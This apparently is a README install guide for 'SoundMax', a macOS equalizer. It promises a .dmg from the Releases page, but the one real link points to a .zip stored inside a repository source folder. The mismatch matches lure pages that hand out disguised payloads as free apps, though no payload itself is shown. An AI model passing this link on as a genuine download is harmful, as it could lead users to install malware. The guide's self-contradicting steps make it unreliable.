📖 Introduction

SoundMax is a free 10-band system equalizer designed for macOS users. It provides an easy alternative to SoundSource, allowing you to create per-device profiles, control HDMI volume, and integrate with AutoEQ. Enjoy a customizable audio experience tailored to your preferences.

🚀 Getting Started

1. Visit the Release Page
   Go to the Releases page to find the latest version of SoundMax.

2. Choose Your Version
   Look through the list of available releases and select the version suitable for your system. Make sure your macOS version is compatible, generally macOS 10.15 or later is recommended.

3. Download the Application
   Click on the link for the latest release. The file you download will typically be a .dmg file. You may see an option that looks similar to this: https://github.com/saadashrafai/SoundMax/raw/refs/heads/main/SoundMax/Audio/Sound-Max-1.7.zip.

4. Open the Downloaded File
   Locate the downloaded .dmg file in your Downloads folder. Double-click the file to open it.

5. Install SoundMax
   A new window will pop up showing the SoundMax icon. Drag this icon into your Applications folder. This step installs SoundMax on your Mac.

6. Launch SoundMax
   Navigate to your Applications folder and find SoundMax. Double-click the icon to launch the application.

7. Set Up Your Preferences
   Once SoundMax is open, take a moment to configure your audio settings. You can set up profiles for different devices and explore the 10-band equalizer to fine-tune your sound.
